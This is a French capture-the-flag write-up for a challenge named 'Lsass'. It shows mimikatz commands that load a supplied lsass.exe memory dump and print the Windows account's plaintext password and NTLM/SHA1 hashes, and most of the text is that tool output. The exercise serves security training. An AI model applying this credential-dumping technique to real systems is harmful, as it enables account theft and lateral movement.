Lsass

Contexte

Un dump mémoire du processus lsass.exe extrait d'une machine Windows 7 vous est fourni. Saurez-vous retrouver le mot de passe de l'utilisateur apssis ?

30MB

lsass.dmp

Ouvrir

Découverte du fichier

lsass.exe est un exécutable qui est nécessaire pour le bon fonctionnement de Windows. Il assure l'identification des utilisateurs.

Le dump mémoire du processus lsass peut contenir les identifiants de connexions des utilisateurs.

La technique de dump est décrite dans cet article :

Extraction des secrets de lsass à distancehackndo

Récupération des identifiants

On lance mimikatz et on charge le dump mémoire :

V:\APSSI\lsass>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

On extrait les mots de passe du dump...

Mot de passe du compte Apssis : #TOUSCYBERVIGILANTS



mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 140399 (00000000:0002246f)
Session           : Interactive from 1
User Name         : Apssis
Domain            : machine_w7
Logon Server      : MACHINE_W7
Logon Time        : 01/08/2021 00:47:10
SID               : S-1-5-21-2443922912-371119193-1189915212-1001
        msv :
         [00000003] Primary
         * Username : Apssis
         * Domain   : machine_w7
         * NTLM     : ffd8a47bcf0d86c2bb879564e101c181
         * SHA1     : 7ea760d71dc1281f55b0a5107d70fd4dbd4b8ae4
         [00010000] CredentialKeys
         * NTLM     : 0268a7022263f5bc52136c2d7c8da085
         * SHA1     : e5b296569165f4d6111dedc0c660f79df16242f0
        tspkg :
        wdigest :
         * Username : Apssis
         * Domain   : machine_w7
         * Password : #TOUSCYBERVIGILANTS
        kerberos :
         * Username : Apssis
         * Domain   : machine_w7
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 140351 (00000000:0002243f)
Session           : Interactive from 1
User Name         : Apssis
Domain            : machine_w7
Logon Server      : MACHINE_W7
Logon Time        : 01/08/2021 00:47:10
SID               : S-1-5-21-2443922912-371119193-1189915212-1001
        msv :
         [00010000] CredentialKeys
         * NTLM     : 0268a7022263f5bc52136c2d7c8da085
         * SHA1     : e5b296569165f4d6111dedc0c660f79df16242f0
         [00000003] Primary
         * Username : Apssis
         * Domain   : machine_w7
         * NTLM     : ffd8a47bcf0d86c2bb879564e101c181
         * SHA1     : 7ea760d71dc1281f55b0a5107d70fd4dbd4b8ae4
        tspkg :
        wdigest :
         * Username : Apssis
         * Domain   : machine_w7
         * Password : #TOUSCYBERVIGILANTS
        kerberos :
         * Username : Apssis
         * Domain   : machine_w7
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : SERVICE LOCAL
Domain            : AUTORITE NT
Logon Server      : (null)
Logon Time        : 01/08/2021 00:46:14
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : MACHINE_W7$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 01/08/2021 00:46:14
SID               : S-1-5-20
        msv :
        tspkg :
        wdigest :
         * Username : MACHINE_W7$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
         * Username : machine_w7$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 30548 (00000000:00007754)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 01/08/2021 00:46:13
SID               :
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : MACHINE_W7$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 01/08/2021 00:46:13
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : MACHINE_W7$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
         * Username : machine_w7$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :
        credman :

PrécédentDropper [.docx]SuivantOncle Sam

Mis à jour il y a 3 ans

hashtagContexte

hashtagDécouverte du fichier

hashtagRécupération des identifiants

Contexte

Découverte du fichier

Récupération des identifiants